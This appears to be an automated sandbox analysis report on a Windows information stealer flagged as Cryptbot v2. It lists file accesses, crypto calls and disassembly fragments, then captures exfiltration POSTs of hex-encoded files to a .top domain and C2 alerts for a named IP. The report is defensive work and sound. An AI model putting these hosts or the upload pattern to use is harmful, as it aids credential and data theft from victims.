Source: 9xNI7vE1XO.exe |
ReversingLabs: Detection: 21% |
Source: Submited Sample |
Integrated Neural Analysis Model: Matched 100.0% probability |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 8_2_00F015B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, |
8_2_00F015B0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 8_2_6C7414B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, |
8_2_6C7414B0 |
Source: 9xNI7vE1XO.exe, 00000000.00000000.2119831306.0000000000DAA000.00000002.00000001.01000000.00000003.sdmp |
Binary or memory string: -----BEGIN PUBLIC KEY----- |
memstr_b652e4d2-a |
Source: 9xNI7vE1XO.exe |
Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED |
Source: 9xNI7vE1XO.exe |
Static PE information: DYNAMIC_BASE, NX_COMPAT |
Source: C:\Users\user\Desktop\9xNI7vE1XO.exe |
File opened: C:\Users\user\AppData |
Jump to behavior |
Source: C:\Users\user\Desktop\9xNI7vE1XO.exe |
File opened: C:\Users\user\AppData\Local |
Jump to behavior |
Source: C:\Users\user\Desktop\9xNI7vE1XO.exe |
File opened: C:\Users\user |
Jump to behavior |
Source: C:\Users\user\Desktop\9xNI7vE1XO.exe |
File opened: C:\Users\user\Documents\desktop.ini |
Jump to behavior |
Source: C:\Users\user\Desktop\9xNI7vE1XO.exe |
File opened: C:\Users\user\Desktop\desktop.ini |
Jump to behavior |
Source: C:\Users\user\Desktop\9xNI7vE1XO.exe |
File opened: C:\Users\user\AppData\Local\Temp |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then lea ecx, dword ptr [esp+04h] |
8_2_00F081E0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
8_2_6C7BAEC0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
8_2_6C7BAF70 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
8_2_6C7BAF70 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
8_2_6C760860 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx+08h] |
8_2_6C76A970 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
8_2_6C76A9E0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx+08h] |
8_2_6C76A9E0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, 6C81F960h |
8_2_6C75EB10 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
8_2_6C764453 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebx |
8_2_6C7E84A0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx] |
8_2_6C76C510 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
8_2_6C76A5F0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx+08h] |
8_2_6C76A5F0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx+08h] |
8_2_6C76A580 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
8_2_6C76E6E0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx] |
8_2_6C76E6E0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx] |
8_2_6C760740 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, ecx |
8_2_6C7E0730 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
8_2_6C7BC040 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx+04h] |
8_2_6C79A1E0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
8_2_6C7BC1A0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx] |
8_2_6C760260 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [6C81D014h] |
8_2_6C814360 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
8_2_6C7BBD10 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
8_2_6C7B7D10 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push edi |
8_2_6C7B3840 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then lea eax, dword ptr [ecx+04h] |
8_2_6C76D974 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebp |
8_2_6C799B60 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebp |
8_2_6C77BBD7 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebp |
8_2_6C77BBDB |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
8_2_6C7BB4D0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebp |
8_2_6C76D504 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then lea eax, dword ptr [ecx+0Ch] |
8_2_6C76D674 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [esp+04h] |
8_2_6C7B9600 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, 6C81DFF4h |
8_2_6C7B3690 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then lea eax, dword ptr [ecx+08h] |
8_2_6C76D7F4 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push edi |
8_2_6C7E3140 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
8_2_6C75B1D0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
8_2_6C76D2A0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebx |
8_2_6C7D7350 |
Source: chrome.exe |
Memory has grown: Private usage: 1MB later: 28MB |
Source: Network traffic |
Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.6:49828 -> 46.173.214.92:80 |
Source: Network traffic |
Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.6:49845 -> 46.173.214.92:80 |
Source: Network traffic |
Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.6:49896 -> 46.173.214.92:80 |
Source: global traffic |
HTTP traffic detected: GET /rvAMJqturkAmDaZoTnSo1730123674 HTTP/1.1Host: home.thirtjo13vt.topAccept: */* |
Source: global traffic |
HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: thirtjo13vt.topAccept: */*Content-Length: 463Content-Type: multipart/form-data; boundary=------------------------4enL9zcffWM8HU13xDwZEZData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 34 65 6e 4c 39 7a 63 66 66 57 4d 38 48 55 31 33 78 44 77 5a 45 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 56 61 73 65 73 65 6c 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 93 29 82 96 11 71 a3 3f d3 26 6b bb 97 5b 49 c1 f1 c8 3a fb 0e 37 3c 27 9f ef e5 f6 84 ef 28 2d 60 49 89 37 3e b3 97 6d d8 af a9 08 0f e1 de 3a d3 0e 4f 17 ed 11 1c 1c 95 a9 2e 4b d1 9a 92 f5 1a 1f 09 2d ac d1 70 6a aa 4a ea 86 61 13 d5 b8 72 d7 0a fe 52 43 82 70 c8 20 c4 ba a7 ba a9 1e 72 87 4c c6 23 3b bf 90 a9 4a 77 d3 81 63 e1 53 09 0a ae 0d ab 03 07 03 3a b9 18 95 cd 69 4a d2 ed 5e bb 9f b7 ba ba 6c e9 d0 5d 16 ab c1 7e 3a 57 19 44 96 19 d5 3f 3d 52 43 fa 57 98 03 dd 02 ec 99 c1 9a d6 fc ce 0d ef 1b af c9 5d 02 6f 72 0c 0f 9d 79 8c 44 14 9a 3f b6 fb 84 c2 31 29 a2 25 2c 0c 35 b9 aa 89 3f 4d b1 53 b5 79 4b 5a b5 e7 59 4d 32 d8 80 42 82 ce 68 b2 3a 44 0e 9a ce 4d ae 1a 80 4f 1f a0 8d 50 76 dd 4c 5e f4 f5 46 37 0d 90 19 6c 9c 7b e3 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 34 65 6e 4c 39 7a 63 66 66 57 4d 38 48 55 31 33 78 44 77 5a 45 5a 2d 2d 0d 0a Data Ascii: --------------------------4enL9zcffWM8HU13xDwZEZContent-Disposition: form-data; name="file"; filename="Vasesel.bin"Content-Type: application/octet-stream)q?&k[I:7<'(-`I7>m:O.K-pjJarRCp rL#;JwcS:iJ^l]~:WD?=RCW]oryD?1)%,5?MSyKZYM2Bh:DMOPvL^F7l{--------------------------4enL9zcffWM8HU13xDwZEZ-- |
Source: global traffic |
HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: thirtjo13vt.topAccept: */*Content-Length: 77577Content-Type: multipart/form-data; boundary=------------------------hSAk0RcQo8uGtUSa3JzeS3Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 68 53 41 6b 30 52 63 51 6f 38 75 47 74 55 53 61 33 4a 7a 65 53 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 47 75 63 6f 62 69 6e 65 78 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a e2 2f ec ee a0 a1 dd 09 19 98 fc 6c 2a 7b f8 19 35 8e 49 55 73 6c 46 8d 4c 44 76 df 31 ec 42 ae f6 dd e9 f4 1d 2a bf ce bc 6d a0 92 b8 07 09 93 2f 64 c6 22 5d 20 a6 f8 bb 6e 3e 47 cf 43 78 20 8a d2 ef 80 41 67 18 35 3f c7 c6 8c 1f 7b 2f 49 19 98 c7 01 8d d8 3d 3a 69 34 f0 ee 35 e7 23 ba 3a 7f 89 0e 0f a9 b4 a9 67 09 e0 18 08 52 1d fa 71 e7 40 da 80 c9 6b ba bb 85 26 55 aa 07 88 4a 5b dd 2d 84 c8 2f c4 27 ca 81 e4 6a d0 3f 23 18 fc 13 d1 3a ca ac ad 65 83 b6 64 3c 42 7f dc 46 78 c9 83 04 df 42 b8 c0 93 1e be 05 a0 de 3a 34 1b ff 8e 6d a6 4d 86 c7 09 8a b5 55 56 dc d5 a0 df bb 38 6e fd a5 38 1c d7 2b af f1 18 3d ff 95 bb 8a 44 2a fc 1e ca 05 e5 df 31 c5 5e aa 91 8b ed e3 cc 72 27 a4 a5 0e d6 9e ce 41 c1 93 ab 91 11 9c c2 31 89 27 19 60 78 b3 6b e9 44 ba 9d 8c 00 df 0c 19 55 87 b1 b0 54 47 c9 6e e1 ea 5f 08 d6 2c f1 b5 a3 e3 ce cc 0e 8b 95 70 0d 2d 6a 9a 6a 3f 98 bb dc 9b f6 d5 36 47 33 86 76 90 79 84 b6 4c c4 b5 3f 8b 4c 82 4e 09 48 8a 96 dc 23 07 ed 4c 43 c6 50 85 0d 78 8a 6e 15 64 6d 39 b5 25 fa f6 f9 61 78 6c a6 8d 2e 6c a3 e7 fa 31 46 cb e2 88 c6 1a 89 52 a7 c3 ca 93 0f ca 67 21 dc 6b 56 81 55 bc 9a ec 31 2e 1c db 44 a4 6e 14 a4 18 fc e5 3a 90 ec c9 6e 5f fe ed 2b e9 81 8c 3c ea 51 c4 d7 03 56 bb c2 9a 5a f7 95 10 29 65 a9 7a 0e 0d d2 9a 10 49 d8 e6 c4 df 27 94 be b2 12 cc c6 11 b2 c9 d7 67 20 41 77 f8 2b c4 ae 60 d4 c1 65 c3 88 2c 55 db b9 06 f3 ad 9d d3 be 78 15 66 de 22 c3 8b 39 85 26 09 ef 5d d4 9d 23 08 fd a9 c6 1f 69 87 e1 2a 7f f9 71 24 7d 5e 2e 85 da 04 60 f0 5c f4 94 3e 35 72 38 a2 23 c3 5a 4c 0d b3 85 ca c4 59 ef 88 a4 49 91 dd aa 2b 84 52 22 71 e1 29 1b fd f0 4e 19 dc 20 0e 30 60 b9 9b 7e c8 99 fb 49 1a 75 64 4f 31 98 02 58 c8 08 a1 24 4f 67 21 6d d2 ec b4 1b 78 a6 6b 70 22 0d 3e 26 80 de e0 0f 0e 7a b0 ef 2b ed 38 ce 70 dd 51 71 6f 4b b |